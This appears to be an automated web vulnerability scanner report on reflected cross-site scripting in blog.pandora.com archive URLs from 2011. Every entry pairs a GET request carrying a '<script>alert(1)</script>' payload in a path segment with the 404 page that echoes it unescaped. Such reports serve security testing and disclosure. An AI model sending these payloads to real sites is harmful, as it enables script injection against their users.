GET /pandora/archivese6355<script>alert(1)</script>dcc343d2bd0/2009/07/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:34 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivese6355<script>alert(1)</script>dcc343d2bd0/2009/07/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bdd32<script>alert(1)</script>e2655d97c30 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009bdd32<script>alert(1)</script>e2655d97c30/07/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:36 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009bdd32<script>alert(1)</script>e2655d97c30/07/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b55f0<script>alert(1)</script>a60f65ec066 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/07b55f0<script>alert(1)</script>a60f65ec066/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:39 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009/07b55f0<script>alert(1)</script>a60f65ec066/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9cddd<script>alert(1)</script>c07d7b6b6e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora9cddd<script>alert(1)</script>c07d7b6b6e1/archives/2009/08/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:33 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora9cddd<script>alert(1)</script>c07d7b6b6e1/archives/2009/08/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9fc45<script>alert(1)</script>73d64655690 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives9fc45<script>alert(1)</script>73d64655690/2009/08/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:35 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives9fc45<script>alert(1)</script>73d64655690/2009/08/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3275c<script>alert(1)</script>7f101df09f6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20093275c<script>alert(1)</script>7f101df09f6/08/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:37 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20093275c<script>alert(1)</script>7f101df09f6/08/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 48254<script>alert(1)</script>063e227bb42 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/0848254<script>alert(1)</script>063e227bb42/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:41 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009/0848254<script>alert(1)</script>063e227bb42/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ee644<script>alert(1)</script>e5f841d0237 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraee644<script>alert(1)</script>e5f841d0237/archives/2009/09/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:30 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraee644<script>alert(1)</script>e5f841d0237/archives/2009/09/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload da5b9<script>alert(1)</script>ee09fe65134 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesda5b9<script>alert(1)</script>ee09fe65134/2009/09/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:32 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesda5b9<script>alert(1)</script>ee09fe65134/2009/09/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload caeac<script>alert(1)</script>9cab335ec9e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009caeac<script>alert(1)</script>9cab335ec9e/09/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:34 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009caeac<script>alert(1)</script>9cab335ec9e/09/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7f8a9<script>alert(1)</script>cdadd2e3fba was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/097f8a9<script>alert(1)</script>cdadd2e3fba/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:37 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009/097f8a9<script>alert(1)</script>cdadd2e3fba/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8a732<script>alert(1)</script>04358b3b570 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora8a732<script>alert(1)</script>04358b3b570/archives/2009/10/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:52 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora8a732<script>alert(1)</script>04358b3b570/archives/2009/10/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cb43c<script>alert(1)</script>796ed772059 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivescb43c<script>alert(1)</script>796ed772059/2009/10/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:56 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivescb43c<script>alert(1)</script>796ed772059/2009/10/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ad1ff<script>alert(1)</script>c05ada4297f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009ad1ff<script>alert(1)</script>c05ada4297f/10/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:00 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009ad1ff<script>alert(1)</script>c05ada4297f/10/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 241d1<script>alert(1)</script>0051722519f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/10241d1<script>alert(1)</script>0051722519f/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:05 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009/10241d1<script>alert(1)</script>0051722519f/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 47148<script>alert(1)</script>a7a6b182afd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora47148<script>alert(1)</script>a7a6b182afd/archives/2009/11/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:52 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora47148<script>alert(1)</script>a7a6b182afd/archives/2009/11/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f6439<script>alert(1)</script>47ec2e2aa5b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesf6439<script>alert(1)</script>47ec2e2aa5b/2009/11/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:55 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesf6439<script>alert(1)</script>47ec2e2aa5b/2009/11/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a0786<script>alert(1)</script>1fdd8212aca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009a0786<script>alert(1)</script>1fdd8212aca/11/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:57 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009a0786<script>alert(1)</script>1fdd8212aca/11/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e31a9<script>alert(1)</script>92fb96256a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/11e31a9<script>alert(1)</script>92fb96256a/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:00 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 348
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009/11e31a9<script>alert(1)</script>92fb96256a/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 55536<script>alert(1)</script>68fbf40c4c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora55536<script>alert(1)</script>68fbf40c4c1/archives/2009/12/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:28 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora55536<script>alert(1)</script>68fbf40c4c1/archives/2009/12/ was not found on this server.</p> ...[SNIP]...
